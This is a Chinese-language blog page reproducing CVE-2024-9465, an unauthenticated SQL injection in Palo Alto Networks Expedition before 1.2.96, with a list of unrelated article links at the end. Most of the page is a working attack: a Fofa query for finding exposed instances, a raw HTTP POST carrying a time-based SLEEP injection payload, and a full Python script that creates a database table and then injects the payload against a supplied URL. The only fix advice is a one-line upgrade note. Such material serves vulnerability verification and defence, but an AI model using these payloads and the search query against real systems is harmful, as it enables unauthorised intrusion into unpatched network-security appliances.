当前位置: 首页 > news >正文

Palo Alto Networks Expedition 未授权SQL注入漏洞复现(CVE-2024-9465)

0x01 产品介绍:

        Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。

0x02 漏洞描述:

        该漏洞由于CHECKPOINT.php文件存在未授权访问。在sql校验逻辑中存在action=import当解析控制参数时会创建变量routename和id并且以字符串格式构造查询。导致了漏洞的产生

0x03 影响版本:

Palo Alto Networks Expedition < 1.2.96

0x04 搜索语句:

Fofa:title="Expedition Project"

0x05 漏洞复现:

poc

POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedaction=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))test)

 

检测脚本:

脚本作者:https://github.com/horizon3ai/CVE-2024-9465

#!/usr/bin/python3
import argparse
import requests
import urllib3
import sys
import time
urllib3.disable_warnings()def create_checkpoint_table(url: str):print(f'[*] Creating Checkpoint database table...')data = {'action': 'get','type': 'existing_ruleBases','project': 'pandbRBAC',}r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30)if r.status_code == 200 and 'ruleBasesNames' in r.text:print(f'[*] Successfully created the database table')returnprint(f'[-] Unexpected response creating table: {r.status_code}:{r.text}')sys.exit(1)def inject_checkpoint_query(url: str):start_time = time.time()print(f'[*] Injecting 10 second sleep payload into database query...')data = {'action': 'import','type': 'test','project': 'pandbRBAC','signatureid': '1 AND (SELECT 1234 FROM (SELECT(SLEEP(10)))horizon3)',}r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30)execution_time = time.time() - start_timeif r.status_code == 200 and execution_time > 9 and execution_time < 15:print(f'[*] Successfully sent injection payload!')print(f'[+] Target is vulnerable, request took {execution_time} seconds')returnprint(f'[-] Unexpected response sending injection payload: {r.status_code}:{r.text}')sys.exit(1)if __name__ == "__main__":parser = argparse.ArgumentParser()parser.add_argument('-u', '--url', help='The URL of the target', type=str, required=True)args = parser.parse_args()create_checkpoint_table(args.url)inject_checkpoint_query(args.url)

 

0x06 修复建议:

厂商已发布补丁 请即时升级

Expedition | Palo Alto Networks

http://www.lryc.cn/news/462299.html

相关文章:

  • c 语言 sprintf
  • stm32单片机个人学习笔记10(TIM编码器接口)
  • 如何在Android中存储数据?
  • 13.3寸工业三防平板数字化工厂产线数采手持终端
  • ssh连接慢的问题或zookeeper远程连接服务超时
  • perf工具使用指导
  • WordPress 禁用上传媒体图片自动生成缩略图及多尺寸图片教程
  • 锥线性规划【分布鲁棒、两阶段鲁棒方向知识点】
  • linux环境下的程序设计与git操作
  • Matlab中HybridFcn参数的用法
  • Leetcode 3316. Find Maximum Removals From Source String
  • jeecg3版本的vue,离线启动
  • C++的内存管理
  • YZ系列工具之YZ09:VBA_Excel之读心术
  • 嵌入式系统---看门狗
  • 从MySQL5.7迁移到8.0时,有哪些重要的参数调整或新参数需要注意?
  • 完整发布/上传uniapp Ios应用到App Store流程
  • CodeActAgent :Executable Code Actions Elicit Better LLM Agents解读
  • 中小型医院网站开发:Spring Boot入门
  • Java读取PDF后做知识库问答_SpringAI实现
  • 打开exe程序显示没有适当的访问权限
  • Python异步编程:使用`create_task`并发执行协程
  • 从零开始搭建你的DolphinScheduler分布式任务调度平台实战指南
  • 第五课:Python学习之if语句
  • 群晖前面加了雷池社区版,安装失败,然后无法识别出用户真实访问IP
  • 【秋招笔试】10.13拼多多(已改编)秋招-三语言题解
  • 50个JAVA常见代码大全:学完这篇从Java小白到架构师(附带讲解)
  • Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.0 SP1升级到SP3操作方法(x64)
  • Centos7安装Git及配置Github
  • MobileNet v3(相比于MobileNet v2)